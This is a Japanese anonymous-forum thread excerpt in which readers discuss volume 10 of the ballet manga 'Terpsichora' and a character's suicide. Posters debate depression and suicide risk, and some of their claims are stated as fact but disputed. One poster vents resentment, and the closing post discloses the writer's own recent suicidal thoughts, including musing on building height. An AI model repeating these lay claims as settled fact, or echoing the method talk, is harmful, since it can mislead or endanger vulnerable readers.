自分が挫折したバレエに懸けていて、他の事も一番なチカちゃんが許せなかったんでしょ。
で、いじめられてるチカちゃんの方は、そういう相手をガン無視して見下すだけなのが、
また猛烈にムカついたんだろうね。。

697 :花と名無しさん:2007/01/23(火) 18:32:28 ID:???0
>692
モニターの設定で色調は変わるから。
みんな同じ色に見えてるとは限らないよ。

698 :花と名無しさん:2007/01/23(火) 18:32:29 ID:???0
>>694
毛箱は論外な性格として、千花ちゃんも
勝ち負けの問題に持っていく傾向があるし、
そこまでの言いようは美化している気が・・・。

699 :花と名無しさん:2007/01/23(火) 18:34:03 ID:???0
>>696
見下すというより、あれがプライドの高いチカにできる限り
できた抵抗なんだと思う。

700 :花と名無しさん:2007/01/23(火) 18:35:07 ID:???0
千花ちゃんは最強で完全無欠なのです

701 :花咲か名無しさん:2007/01/23(火) 18:47:10 ID:???0
10巻読んだら、ユキもまあ努力してるじゃん、と思った。
1人でこっそりストレッチとか行動してるし。
チカは恵まれすぎ→不幸になったけど、
ユキ、背も低くないし、太りやすくもないし、華があるらしいし、
脚のことはあるけどそれ以外は今のところ十分恵まれたキャラクターだから
次に不幸になるのはユキだったりして。
ユキ嫌いじゃないけども。

702 :花と名無しさん:2007/01/23(火) 18:54:56 ID:???0
このスレでネタバレ読んでたから覚悟は出来ていたけど、
絵で、トゥオネラで踊る千花を見たら涙が出てきた。
六花のトゥオネラの白鳥があって本当に救われた。
死も昇華することが出来るバレエってすごいな。
芸術が人を殺したり生かしたりするんだな。
漫画を真に受けるのおかしいけどさ。

703 :花と名無しさん:2007/01/23(火) 19:21:27 ID:???O
ユキが憎いとかいう人がいてビックリ!
チカの死は漫画の出来事とは思えないほど悲しい。けど、それはユキのせいじゃないでしょ…。


704 :花と名無しさん:2007/01/23(火) 19:31:34 ID:???O
「死」を美しいものだと勘違いしないようにとの作家の配慮は感じた
「『顔は』綺麗だったんだよ」(お父さん)


705 :花と名無しさん:2007/01/23(火) 20:22:03 ID:???0
チカが死んでしまうなんて悲しすぎる。
今日喜んで本買ってきたのにいっきにブルーになってしまった。

706 :花と名無しさん:2007/01/23(火) 20:51:40 ID:???0
病院からの帰り朝焼けを見ながら決意にみちたチカの顔。
あの時死を決意したんだよね。あの世で踊り続けるって?

707 :花と名無しさん:2007/01/23(火) 20:51:54 ID:???0
どうでもいいが、最終話の絵の荒れ具合はいかがなものか…
下書きじゃないんだからさ
せめて線と線はちゃんとつないで閉じておいてほすぃ
せっかくのクライマックスが、別の意味で哀しいです

708 :花と名無しさん:2007/01/23(火) 20:55:42 ID:???O
>706
いま、別にチカが決意したわけではないのでは…?
ただ、夢の影響もあってユキの心の中でそう思ってるって感じ。

709 :花と名無しさん:2007/01/23(火) 21:27:18 ID:???0
>>706
そこは読者が色々想像してもいいかもしれないね。
あの厳しい顔は、今後辛い道になることを痛いほどわかって
それでも自分はそこを進むんだ、という決意の顔かもしれない。

立ち直ったように見えてふっとまた崩れてしまうとは言うけど
あの日あの時、マンションの屋上に逝ったチカは
どういう出来事が起きたのだろう、とも想像してしまう。
誰かの本当に小さい何気ない一言があったのか、何もなかったけど
やっぱりダメだという気持ちが再び強まったのか。
あの時の防犯カメラの映像を、千恵子はどうしたのかな。
見たのかな?自分なら生きてる最後の最後の姿ってことで
辛くてもセキュリティ会社の人に行ってダビングしてもらうかも。
でも死に行く我が子がうつってる最後のビデオなんか
まともな精神で見れないか…叫んじゃうかもね(泣)

710 :花と名無しさん:2007/01/23(火) 21:29:15 ID:???0
ゆきは何も悪くないし子供だけど、ほんと無神経だね
「その程度で悟った気に」って言われて「いじわる」って泣いてるところとか
お前どんだけ無神経やねんってはったおしたくなったよ
子供の無神経さってあんなもんだろうけどね、全然愛せなくなった主人公ではあった

711 :花と名無しさん:2007/01/23(火) 21:41:03 ID:???0
>>703
まあ、コンビ(じゃないけど)の片方だけ悲しいことになったら、
相方は憎まれるのが世の常だよ。
「○○はこんな目にあってるのに、なんだあいつは」とか。
たとえ無関係でもそうなんだから、姉妹ならなおさらね……。

712 :花と名無しさん:2007/01/23(火) 21:43:09 ID:???O
一番無神経なのは母親。

713 :花と名無しさん:2007/01/23(火) 21:46:47 ID:???0
ユキを悪く言うやつは俺が許さへん

714 :花と名無しさん:2007/01/23(火) 21:51:43 ID:???0
>709
>立ち直ったように見えてふっとまた崩れてしまう
そーでなくて、自殺する人はすべて鬱なんだけど、
鬱というのは直りかけが一番自殺しやすいんです。
鬱が最悪の時は、自殺しようという気力もなくなる。
でも直りかけて色々やる気になってくると、死ぬ気も出てくる。
おばあちゃんはちょっと自殺の後押しをしてしまった感が…
もっと早く精神科に行くべきでした。

715 :花と名無しさん:2007/01/23(火) 21:53:06 ID:???0
まわりも「カウンセリングにつれていこう」くらいの配慮に気づけばよかったね

716 :花と名無しさん:2007/01/23(火) 21:57:19 ID:???0
>715
「泣き出したら精神科」と思えばいいです

717 :花と名無しさん:2007/01/23(火) 21:58:57 ID:???0
>>714
>鬱というのは直りかけが一番自殺しやすいんです。

それもまた決め付けな訳で。
そういうデータでもあるの?どうやって調べるの?
とりあえず、作中でも言及してないんだから、
「その可能性もある」くらいにとどめておいたほうがいいと思う。
別に>>709の解釈でも間違ってないと思うよ。
どっちも思うほうを信じればいい。

718 :花と名無しさん:2007/01/23(火) 22:02:02 ID:???0
なんでも鬱のせいにする人っているよね。
(まあこういう世間の無神経さが鬱を呼ぶのかもしれないけど)
アメリカ並みとまで行かないまでも、もう少し日本もカウンセリングが
身近になればいいのかもね。
(カウンセリング大国のアメリカも自殺は増える一方だが)

719 :花と名無しさん:2007/01/23(火) 22:02:48 ID:???O
その辺難しいよ。元気になってきた→自殺てパターが多い…

720 :花と名無しさん:2007/01/23(火) 22:06:01 ID:???0
まぁ争うのはやめましょう。
そこまで人を熱くさせる漫画だということで。

721 :花と名無しさん:2007/01/23(火) 22:07:43 ID:???0
元気になってそのまま回復する人もいるし(むしろそのほうが多い)、
落ちたまま自殺に至る人もいるしね。
「直りかけが一番自殺しやすい」ってのは根拠ないよ。
まして千花がそれに該当するとは言い切れないと思う。

722 :花と名無しさん:2007/01/23(火) 22:10:11 ID:???0
鬱の直りかけが自殺しやすいのは本当ですよ。
精神科医に聞いてみればわかります。
そんで自殺する人は、その時は鬱なんですよ。
だって正常な精神なら自殺なんてしませんから。

723 :花と名無しさん:2007/01/23(火) 22:11:20 ID:???0
茜ちゃんてコミクスで見るとスタイルめっちゃいいし顔もけっこうかわいいように
見える・・・自分は変だろうかw
ユキちゃんのコリオグラファー誕生姿綺麗だった。ダヴィで見たときは何も感じなかったのに。

724 :花と名無しさん:2007/01/23(火) 22:20:07 ID:???0
チカうちゅには見えなかったけどな〜。

725 :花と名無しさん:2007/01/23(火) 22:26:33 ID:???0
>>722
もういいから。

726 :花と名無しさん:2007/01/23(火) 22:37:02 ID:???0
千花ちゃんには生きてて欲しかったなぁ。
毛箱、ちょっとでいいから後悔とか反省とか見せて欲しかった。。。

727 :花と名無しさん:2007/01/23(火) 22:40:11 ID:???0
結局10巻で完結なんだろうか。
ダ・ヴィンチ読んでる人連載は続いてるの?

728 :花と名無しさん:2007/01/23(火) 22:42:15 ID:???0
10巻で第一部が完結って第二部が終わるのは何年後なんだ。。

729 :花と名無しさん:2007/01/23(火) 22:43:06 ID:???0
二部はじまるって話だったよ。今は全然別の短期集中連載してるけど。

730 :花と名無しさん:2007/01/23(火) 22:44:25 ID:???0
一応予告では今年の春再開の予定。

731 :花と名無しさん:2007/01/23(火) 22:44:53 ID:???0
「どういうこと?話が見えないんだが」のトガッシーの顔、笑える

732 :花と名無しさん:2007/01/23(火) 22:45:10 ID:???0
>710
ほんとに無神経だったらチカの目の前で何も考えずに
泣いてるよ
部屋を出て泣いてる気遣いに気がつかないんだね

733 :花と名無しさん:2007/01/23(火) 22:45:15 ID:???0
習い事を2人でやってた片方が脱落しそうだ
脱落した方のが才能もあって命かけてやってて熱意もすごかった
そんな場合、もう片方ってその話題すらしないのが思いやりじゃないかな

例えはへんだが、浅田真央が再起不能かもってケガして
浅田舞が真央の前で「今日レッスンでね〜」「こんな風にいわれてひどいよ」
とか言って愚痴たれたり笑ってたら、舞は無神経と思う
習い事の内容だの、やれなくて悩みすらもてない人相手に
愚痴を言ったり喜んだり、ちょっと信じられないよ
ね、六花ちゃん




734 :花と名無しさん:2007/01/23(火) 22:45:27 ID:???0
夏に2部がはじまる。さて六花は何歳になってるのかな。

735 :花と名無しさん:2007/01/23(火) 22:45:42 ID:???0
茜、一ページアップだったときは仰天したわ。
あの顔なのに、トーンで立体感つけてそれなりに描いちゃうって
漫画家ってすごいって思った。

ダヴィンチで連載中読んでいるときは間延び感もあったのに、
こうして一冊にまとまると息苦しいほどの緊迫感で
最後の六花ちゃんの姿にカタルシスがあった。

736 :花と名無しさん:2007/01/23(火) 22:46:07 ID:???0
>>710
あれは確かに意地悪な気持ちからのセリフなのだから泣いても仕方ない。
六花は「千花ちゃんの言った通りだね」という善意で、
千花にその話をしたのだろうしね。
ただそれを聞くにはつらい千花の心情を察せなかったという配慮の足らなさはある。
姉妹の間ではあることで、千花なんてずっと優しい方だと思う。

737 :花と名無しさん:2007/01/23(火) 22:50:08 ID:???0
千花ちゃんトウォネラで少しでも笑ってくれたら救われたのに・・。

738 :花と名無しさん:2007/01/23(火) 22:57:35 ID:???0
>>733
千花ちゃんに貝塚での出来事とか話す六花ちゃん
は無神経だと思うけど、
その理由は、バレエができない状態の千花ちゃんのつらい気持ちを斟酌すべきというもので、
千花ちゃんの方が才能云々という問題とは違うと思うな。
スロースターターだけど、六花ちゃんには六花ちゃんの才能がある。

739 :花と名無しさん:2007/01/23(火) 22:59:47 ID:???0
千花ちゃんがあの六花ちゃんの踊り見てたらきっと驚いただろうね。
泣いてくれたかも?
ああ、やっぱりコミクスで見た方が発見があって面白いな。
ふとみちゃんの私服ちょいダサ目でふとみらしくて良いね。

740 :花と名無しさん:2007/01/23(火) 23:06:24 ID:???0
>738
そういえば六花が一時期バレエやめてた時
お父さんが千花にバレエの話をしないように言ってて
千花は気を使ってたな。

741 :花と名無しさん:2007/01/23(火) 23:06:32 ID:???0
いや六花のようにすげー嫌な奴っているよ。
私の方が才能あるんだけど、なのに私がうまく行かなくて、
そいつが成功しててまるで才能あるかのように言われてて、
なのにそいつってば、六花みたいにその分野の話題を話してて最悪。
お前なんて私より才能劣るんだから、もっと遠慮しろっつーの。
「私はやりたいことだけやってるし、大きな結果は狙っていない」とか欲のなさそうなセリフ言っといて
ずっといい目にばかりあっている。
成功する資格は私の方があるのに、そんな資格のない奴がうまく
行っているからって、無神経にその分野の話題をする。
あの女も六花も大嫌い。


742 :花と名無しさん:2007/01/23(火) 23:10:59 ID:???0
また変なのが出てきた

743 :花と名無しさん:2007/01/23(火) 23:11:54 ID:Ic5U2xu8O
722の言ってること結構まともだと思うが
基礎的ウツ知識としては
根拠ないとか 自分は調べもしないでいうのは勝手だが
近くにうつの人がいた時には気を付けてね
ありふれた病気だし知識はあったほうがいいから

作品的にはなかなかリアルで(最後に駄目押しになったのがなんなのか遺族には そしてその視点に乗っかる読者見えないところとか)考え抜いてかいたんだなあと思ったよ
キャラより作品なんだね〜

744 :花と名無しさん:2007/01/23(火) 23:12:57 ID:???0
>>735
「あんな顔」って、そんな顔にしたのは他ならぬ作者ですからw

745 :花と名無しさん:2007/01/23(火) 23:15:47 ID:???0
>>741
ずっとうまく行っているくらいだから、あなたが憎んでいるとおぼしきその人に才能があるんじゃないの?
あなたが、自分こそ才能があって「成功する資格のある」人間だと思い込み、
欲のなさそうな相手を見くびっていただけで。

746 :花と名無しさん:2007/01/23(火) 23:15:56 ID:???0
ホント執念深いな。

747 :花と名無しさん:2007/01/23(火) 23:18:32 ID:???0
>>741
あまりそういう歪んだ自己愛を、テレプシや千花ちゃんに投影されてもな。

748 :花と名無しさん:2007/01/23(火) 23:21:13 ID:???0
>>743
まあ、鬱の人は面と向かって「死ぬ直前が元気出るんです」とは言わないし。
「私死ぬかもよ?(笑)」とか言われても冗談に受け取らないほうがいいって事?

749 :花と名無しさん:2007/01/23(火) 23:22:52 ID:???0
>>741
ルサンチマンをこのスレにぶつけてどうする。
別の板の「気に入らない女を呪うスレ(仮)」とかにでも逝ってくれ。

750 :花と名無しさん:2007/01/23(火) 23:23:12 ID:???0
>>741は千花みたいに我慢強くないし
こういうところで吐き出すことが出来るから
死ななくていいね。むしろ高森ぽいとも言う。

751 :花と名無しさん:2007/01/23(火) 23:24:08 ID:???0
千花ちゃんがせっかく優れていたのに、
劣等生だった六花が途中から美味しい目にあうから
嫌な作品。
千花ちゃんが六花の成長に驚く場面で
ギシはそんなに六花マンセーしたいの?ってむかついた。

752 :花と名無しさん:2007/01/23(火) 23:27:56 ID:???0
>>750
私は千花似ている。
才能があり親から多く愛され期待されなのに才能があるのにうまく行かなくなって、
鬱にもなった。
あの女や六花は不幸になっても当然の報いさ。嫌がらせされても当然だな。

753 :花と名無しさん:2007/01/23(火) 23:28:49 ID:???0
他の人も書いてたけど、
最後の「ここに一人のコリオグラファーが誕生した」のとこ、
泣けて泣けて仕方なかった。
本誌で読んだ時はなんとも思わなかったのに、続けて読むと全然味わいが違う。
やはりコミクスはよいな...

754 :花と名無しさん:2007/01/23(火) 23:29:40 ID:???0
作中のキャラにここまで感情移入して、ムカついたりすることが出来る
ギシの凄さを改めて感じた。
最近の漫画でここまでキャラにムカつく読者ってあまりいないし。

755 :花と名無しさん:2007/01/23(火) 23:29:43 ID:???0
>>752
日本語がおかしい。チョ(ry

756 :花と名無しさん:2007/01/23(火) 23:30:27 ID:???0
>>750
ぽい、というより高森そのものじゃない。
成功できてないのに自分より優れてるのが気に入らなくて妬みそねみで一杯。

757 :花と名無しさん:2007/01/23(火) 23:32:49 ID:???0
高森ならまだ漫画の中の人だからいいけど、
現実の人間が漫画の中の人にここまで妬むのは凄いな。

758 :花と名無しさん:2007/01/23(火) 23:33:14 ID:???0
>>752
嫌がらせって、やっぱ高森に似てるんじゃんw
鬱っぽい所以外、千花ちゃんには似てない。
>>741の成功している相手を妬み貶めようとしている
ようなのも、高森に似ている。

759 :花と名無しさん:2007/01/23(火) 23:33:49 ID:???0
てゆか、千花ちゃんみたいな顔よし性格よしで才能あふれた美少女に
自己投影するなんて、どんだけ図々しいんだ。
漫画読んで2ちゃんでキャラの罵倒する程度の人間のくせに。

760 :花と名無しさん:2007/01/23(火) 23:35:10 ID:???0
チカちゃんはネットで罵倒したりしないもんねw

761 :花と名無しさん:2007/01/23(火) 23:35:17 ID:???0
でも確かに高森こそ、
千花ちゃんがバレエをしている話に、
「私の方が優秀なのに無神経」「生意気」
と思ってたりしたのかな?

762 :花と名無しさん:2007/01/23(火) 23:36:32 ID:Ic5U2xu8O
>>748
うんその通り
慌てて大騒ぎしてもいけないけど 根も葉もない言葉だとは思わないほうがいいと思う
少なくともそれを言いたくなる心理状態があるわけだから 程度の差はあってもね
まあボダのひとだとまたアレですが…
あと ウツの人が突然元気になって前向きになったときも危険です…
ゆりもどしが激しいもんで

763 :花と名無しさん:2007/01/23(火) 23:38:27 ID:???O
チカはけしてユキを憎んだりはしなかった。

漫画の中の2に書き込んでたら怖いけど、むしろそういう人間を憎んで
そうはしなかったから、自殺に至った。その潔癖さが悲しい。

764 :花と名無しさん:2007/01/23(火) 23:39:41 ID:???0
このの住人ってほんと馬鹿だな。大馬鹿。
優れた人間が妬まれるってことがよく分かったよ。
優れた人間が現実に存在することが許せない馬鹿。
私はお前達なんぞもう相手にしない。

765 :花と名無しさん:2007/01/23(火) 23:42:42 ID:???0
>>764
あ〜よかったw バイ!

766 :花と名無しさん:2007/01/23(火) 23:42:58 ID:???O
鬱の人もリアル高森女も自分語りでしつこいな…
こんなのが集まるギシスレ\(^O^)/

767 :花と名無しさん:2007/01/23(火) 23:43:27 ID:???0
>>761
高森と、S中のダンス部の部長さんってちょっと対比になっているよね。
二人ともバレエ挫折組。
でも部長さんは、年月を経たのもあって自分を冷静に受け止めていて、
バレエを巡ってちょっとつっかかったりしても、
意地悪はしないし面倒見がいい。

768 :花と名無しさん:2007/01/23(火) 23:57:43 ID:???0
>>767
しかしあれでゆきが振り付けを変えられなかったら
意地悪なままだった?かな?
多分根は悪い子じゃないけど

それよりS中ダンス部で何があったのか
漏れは気になってしかたない

769 :花と名無しさん:2007/01/23(火) 23:59:45 ID:???0
>>706
あの場面の時の千花は、祖母の件を契機に立ち直るつもりだったと思う。
日記でも、祖母の心に動かされたような記述があった。

それ以前に、千花が夜歩きしている場面があって、
その時にふとみ同様、死に場所を探しビル巡りしてたんじゃないでしょうか。
なにせ家でお風呂に入らないもんだからエンコウが心配されてたりしたけどw

それで祖母を見舞った後、かつて自分が死に場所を求めた
ビルを、そういう自分と決別するような気持ちで眺めてた。
(夜歩きも、この場面も、千花が自殺場所を探していたという伏線でもある。)

一旦元気になったけど、何か毛箱の嫌がらせかなにかで、
まだ不安定な気持ちがぶり返して、飛び降りた。
以前死に場所の目星はつけてあったから、すぐに自殺できてしまったorz
という風に解釈してますた。

770 :花と名無しさん:2007/01/24(水) 00:02:25 ID:???O
この漫画は…、教育上良くないと思いますが、皆さんはどう思われますか?
一部の(例えば、親子関係に上手くいってない)子供達から見たら自殺推奨漫画にも見られますよ?

771 :花と名無しさん:2007/01/24(水) 00:02:42 ID:???0
>>768
根は良さそうな人で、高森と性格違うように見えたけど、
でも、あのままバレエっぽくしていたら、
険悪さやしこりが残ってしまっていたかもね。
六花は甘ったれだけど、そこいら辺の柔軟性は母親よりあるかも。

私も、あの元顧問が白キャラじゃなかっただけに、
何があったか気になる。

772 :花と名無しさん:2007/01/24(水) 00:04:38 ID:???0
>>770
は?

773 :花と名無しさん:2007/01/24(水) 00:08:28 ID:???O
あー自殺オチだったとは…山岸漫画で覚悟はしてたけど…
つか最初の医者はなんか罪に問われんのかいな

774 :花と名無しさん:2007/01/24(水) 00:08:39 ID:???0
>>770
まあ...子供用の漫画ではないですね。確かに。
子供はあれですよ、柄亀とかスラダンとかそういう推薦図書を一通り読んでからry

775 :花と名無しさん:2007/01/24(水) 00:11:08 ID:???0
柄亀は主人公が、母親を殺させた男(ロリ)にストーカーされる話ですよ。
セクースシーンで黒乳首も出ますし。教育上いかがなものでしょうか。

776 :花と名無しさん:2007/01/24(水) 00:12:08 ID:???0
そもそも掲載誌が大人向けの雑誌なんだから、
子供がどうのと言われてもなあ。

777 :花と名無しさん:2007/01/24(水) 00:12:48 ID:???0
>>706
>>769

自分は、あのシーンは、周囲に自殺を考えていることを悟られまい
として(日記も死後読まれることを想定して)の発言だったように
思えてならない。
自分も経験あるので、こういった「生への努力」というカモフラージュ
をした上での本番(=自殺遂行)、というリアリティに、
ギシ先生はすごく取材したのかな、と恐れ入った。

778 :花と名無しさん:2007/01/24(水) 00:13:01 ID:???0
>>770
自殺推奨ではないでしょ?
篠原一家は反面教師のようなもの。
千花ちゃんをはじめまっとうな一家だからこそ、提示できる落とし穴もある。
子供に強さを強いたり、弱みを見せまいとしたり、
子供や自分の道を狭く捉えたり、他人の目にあまりに影響されたり
することの弊害っていうか。
思い通りの人性でなくても、そこで思いつめたりせずに生きる必要性っていうか。

779 :花と名無しさん:2007/01/24(水) 00:14:01 ID:???0
>>770
自殺推奨してるように見える時点で、自殺予備軍
人生はマターリといきましょうwww

780 :花と名無しさん:2007/01/24(水) 00:14:36 ID:???0
>>777
死後読まれることを想定しての日記だったら
killをはじめ、ああいう内容にはしないような。

781 :花と名無しさん:2007/01/24(水) 00:15:00 ID:???0
>>775
セクースは生涯でただ一度だけ、という部分は、結構良い性教育になるのではないかとw

782 :花と名無しさん:2007/01/24(水) 00:16:48 ID:???O
お子さんには負の暗示をお勧めする。
テレプシなど甘い、甘過ぎ。

783 :花と名無しさん:2007/01/24(水) 00:16:59 ID:???0
この漫画を理解できるガキがいたらそれはそれですごい。

漏れは毛箱よりも、最初の手術した医者に天誅を食らわせたいと思う
お前も利き腕の靭帯切って外科医やめれー

784 :花と名無しさん:2007/01/24(水) 00:17:14 ID:???0
境界性人格障害者みたいな人の自殺だったら、
読んでもらいたいがための日記を残しそうだけど、
千花ちゃんはもっと潔癖そう。

785 :花と名無しさん:2007/01/24(水) 00:19:03 ID:???0
精神的にギリギリで書いていた日記なのに
killの字が美しい筆記体なのが悲しい。
惜しい人を亡くしました、マジで。

786 :花と名無しさん:2007/01/24(水) 00:20:12 ID:???0
クミちゃんの存在を無かったことにさせたクレーマーって
770みたいな感じだったのかなあ…。
どんな感じでかっこよく復活するか楽しみだったのに!!

787 :花と名無しさん:2007/01/24(水) 00:21:18 ID:???0
Kill!の!も「▽
○ 」 なんだもの...

788 :花と名無しさん:2007/01/24(水) 00:21:50 ID:???0
クミはまだ出てくる可能性はあるような

789 :花と名無しさん:2007/01/24(水) 00:22:10 ID:???0
ああ..ずれたorz

790 :花と名無しさん:2007/01/24(水) 00:23:45 ID:???0
金子先生は家政婦になっちまって苦労性だな〜
ほとんど住み込みだお

791 :花と名無しさん:2007/01/24(水) 00:24:06 ID:???0



792 :花と名無しさん:2007/01/24(水) 00:25:14 ID:???0
教育上よくないとか言って、臭い物に蓋するだけだから
物事が解決しないまま深刻化していくんだよ


なーんてマジレスww

793 :花と名無しさん:2007/01/24(水) 00:25:33 ID:???0
金子はまんまと長女の座についたよね。篠原金子。

794 :花と名無しさん:2007/01/24(水) 00:26:44 ID:???O
まあ教育上で言ったら少女売春の時点でね…

795 :花と名無しさん:2007/01/24(水) 00:28:12 ID:???0
金子先生って尊敬してしまうな。

796 :花と名無しさん:2007/01/24(水) 00:29:45 ID:???0
>>793
あの名前はそういう伏線だったのか!!

797 :花と名無しさん:2007/01/24(水) 00:29:52 ID:???0
これで千恵子さんまで自殺とかしたら
金子先生が後妻に収まる可能性はある?

798 :花と名無しさん:2007/01/24(水) 00:31:24 ID:???0
1巻と10巻くらべてみたら
ユキの顔がちゃんと成長していることに驚いた!!
大人になったわね、ユキちゃん!

799 :花と名無しさん:2007/01/24(水) 00:33:04 ID:???0
>>797
何事もなかったように収まるでしょうねえ。

800 :花と名無しさん:2007/01/24(水) 00:33:19 ID:???0
>>797
金子は、ねえやが本職

801 :花と名無しさん:2007/01/24(水) 00:35:13 ID:???0
今日の朝刊に広告がでてたらしいけど、どの新聞か分かりますか?
明日図書館で確認してきたい・・・

802 :花と名無しさん:2007/01/24(水) 00:35:58 ID:???0
>>786
>クミちゃんの存在を無かったことにさせたクレーマーって
kwsk

803 :花と名無しさん:2007/01/24(水) 00:40:59 ID:???0
読売新聞に出てた。
千花が自殺しないバージョンを読みたいな。
外出中かって読んだけど、展開にショック受けた。

804 :花と名無しさん:2007/01/24(水) 00:43:36 ID:???O
読売だよ。

805 :花と名無しさん:2007/01/24(水) 00:47:35 ID:???O
>>770の者ですが、物語上、千花が自殺する展開は不自然では無いという事と、>>778さんのようなお考えも、正しいと思います。でも、やっぱり物語のキャラを自殺させるのは両刃の剣の効果が有ると思います。
最初はあまりの衝撃で悩んでいた事が消されるけど、
もしかしたら、誰かが千花のような追い詰められた子供がどこかで読んでいるかもしれませんよ。
お話の展開を考えたらこのような事になるのは仕方ありませんが…。漫画の影響力というのは恐ろしいものです。

806 :花と名無しさん:2007/01/24(水) 00:51:49 ID:???0
最終話で雨宮がつけてたクマさんのネックレスが気になる椰子は挙手しろ

807 :801:2007/01/24(水) 00:52:44 ID:???0
レストンクスです。読売ですね。
販売店にいって今日の新聞置いてないかも、聞いてみようっと。。

808 :花と名無しさん:2007/01/24(水) 00:53:19 ID:???O
でも自殺したら親兄弟先生がこんなに悲しむんだ、と思いとどまってくれるかもしれませんよ。そして人生の選択肢もひとつではないと言うこともわかるかもしれません。

809 :花と名無しさん:2007/01/24(水) 00:53:37 ID:???O
読売だよ。

810 :花と名無しさん:2007/01/24(水) 00:55:58 ID:???O
ここ読みかけで寝ちゃって、今一気に読んだ
何かすごい人出てきてたんだね(^_^;)
朝日の風景のシーンは、自殺するんだ私、
とチカちゃんがしみじみ思ってるようにも見える
おばあちゃんが〜とあるけど、でも私は決めたから、みたいな
何というか、いっぺん自殺を決めたら、
それは割と甘美な思いに近くなるのではと
もがいて苦しんでるときより
死神に捕まえられた?ような状態なのかもしれないけど
だから死に場所を探してビルを徘徊してたとしても、
それは生をやめる、て決めてしまったから、
吹っ切れた故のすごい行動力かな、と思う

811 :花と名無しさん:2007/01/24(水) 01:00:20 ID:???0
ふとみちゃんを大地はリフトできたのか

812 :花と名無しさん:2007/01/24(水) 01:01:38 ID:???O
自殺推奨の真逆じゃね?
思春期で純粋ゆえに視野がせまくなり、プロのバレリーナでなければ価値がないと思って死んじゃう。
はたから見てると、人生もっと違う生き方あるよ!と思うのに、本人はそれを見つけられない。

挫折しても、家族が解ってくれなくても、いじめがあっても、死んだらすべての可能性を捨てるわけで。

ただの漫画だけど、千花の死は鬱な気分になるほど重い。
その重さを感じさせてるのはすごいと思うけど。

うまく言えなくてスミマセン…

813 :花と名無しさん:2007/01/24(水) 01:10:17 ID:???0
バレリーナ以外のダンサーでもあの足では無理?
劇団四○に元バレリーナで足いためてプロのバレリーナは無理になった時に
拾ってもらったとか言う人が居たと思うけど

814 :花と名無しさん:2007/01/24(水) 01:16:53 ID:???O
ッFニャ?

815 :花と名無しさん:2007/01/24(水) 01:24:12 ID:???0
貝塚先生って元バレリーナだよね?
昔は細かったの?

816 :花と名無しさん:2007/01/24(水) 01:42:30 ID:???O
>>802
なかったことに「させた」勢力なんてのは妄想だし
大体10巻まで読んでればなかったことになんかなってないとわかるでしょ。

817 :花と名無しさん:2007/01/24(水) 01:44:21 ID:???O
チカ、ユキはわかった。
もう一人いなかったかい?いなくなった子だが

818 :花と名無しさん:2007/01/24(水) 01:52:48 ID:???O
>>805
そう考える人は「DJオズマを子供が見たらry」というのと同じ人種だね。
子供が自殺する物語なんてのは沢山あるしそれに影響される子は、その物語が無くても死んでるよ。
自分の目の届かない所でやってる分にはOKなの?
「人間・失格」には何も思わないの?

時代劇なんか切腹の連発だけどあれは?
白虎隊見て、「体制が滅びたら自殺するのはアリなんだ」って思う子いる?
いるとしたらそれは物語のせいじゃないよ。

819 :花と名無しさん:2007/01/24(水) 02:06:53 ID:???0
自殺推奨していると言っている人は、
単に千花ちゃんの死という展開が気に入らなくて、
自殺推奨云々を、批判の口実にしているようにも見える。

820 :花と名無しさん:2007/01/24(水) 02:10:06 ID:???O
流れ読まずに投下するが、
ドラゴンボールの
悟空(天然、修行を重ね敵に負けなくなる、ある意味無神経)
ベジータ(サイヤ人の王子、天才戦士だが悟空・敵ボスに勝てない、プライド高い)

が、六花・千花と重なってしまう…千花にブルマがいたら…

821 :花と名無しさん:2007/01/24(水) 02:29:13 ID:???O
>>819
決して自殺を美化してないのにね
高森もちっとも改心してないし
残された家族は、辛いながらも、
日常の生活に戻らざるを得ない様子を淡々と描写している
しおりんが、親より先に行かないでね、
て言ってるのは、ギシ先生なりのお子ちゃま向けのメッセージというか配慮にも見える
(らしくないから違うか)

822 :花と名無しさん:2007/01/24(水) 02:32:53 ID:???0
お母さんが「バレエを踊らない千花なんて・・・夢にも考えられないと・・・」
と泣いてるシーンと、六花の「千花ちゃんとの思い出が濃すぎて踊るのはつらい・・・」
という独白のシーン、千花の踊ってる姿(オーロラ、クララ)が、品があって
ほのかに女らしい甘さがあって夢のように美しいね。うっとり。
六花の踊りはまだちょっと少年ぽい無性さを残してるけど千花はそれより少しだけ女。
すごいなあ・・・

823 :花と名無しさん:2007/01/24(水) 02:33:37 ID:???O
大地がブルマほど積極的ならな……。
するってーと茜はヤムチャか。
いずれ弱体化するのかw


ふとみはクリリン?空美はピッコロかな?

824 :花と名無しさん:2007/01/24(水) 02:38:16 ID:???0
それと大地君が泣いてしまったときのお母さんの独白
「良かったわね、千花、おまえを好きな男の子がいたわ」
で涙腺決壊。

825 :花と名無しさん:2007/01/24(水) 02:38:41 ID:???O
さしずめ桜子は天津飯。鳴り物入り(エリートクラス)で登場したが
早々に退場、いまや空気。

826 :花と名無しさん:2007/01/24(水) 02:51:10 ID:???0
>>821
「テレプシ」は、「この作品の登場人物が挫折にあいつつ立ち直ったように、貴方もつらいことが
あっても立ち直ってね」というメッセージの話でなくて、
自殺に至る過程を描くことで、自殺を回避させようとする方向性だよね。
千恵子さんはいい母親だけど、もう少し子供に歩み寄って手を差し伸べてればとか、
別のあり方を提示してあげてればと思わされるし、
千花もいい子だけど、もっと自分の思いを出したり弱みも見せた方が、
道が開けたと思わされたり他にもいろいろ思わされた。
それでも生きていれば、挫折したり人には言えない悩みを抱えることも
あるかもしれないけど、それでも死ぬより生きる方がいいという描かれ方だと思う。

827 :花と名無しさん:2007/01/24(水) 02:55:40 ID:???0
桜子は、本部エリートとしては初登場で目を引いてたのにね。
バレエの才能は今一でも、
千花やふとみへの態度からして性格よし、
賢明で、それは中学生にしてネットでのスルーを心得ている点でも証明済み。
静かな怒りがちょと怖いw

828 :花と名無しさん:2007/01/24(水) 02:57:18 ID:???0
>>824
あれでちょっとだけ報われてたね

829 :花と名無しさん:2007/01/24(水) 03:04:05 ID:???0
>>812
うむ重い。
ふとみも重い。

830 :花と名無しさん:2007/01/24(水) 04:17:59 ID:???0
>>741
うわ〜。リアル高森。こえーww

831 :花と名無しさん:2007/01/24(水) 04:50:24 ID:???O
>>830
なぁにそのうち、人魚に食われるさ

832 :花と名無しさん:2007/01/24(水) 06:26:37 ID:???O
>>826
>自殺への過程を描く事で自殺を回避…
全くそうだと思う

自分、ここ数週間位本気で自殺を検討してたんだが…
数日前から親や友人との連絡を絶ち、ぼんやり過ごしてた
部屋から見える建物を眺めて「7階位ならちゃんと死ねるかな」とか考えてたよ
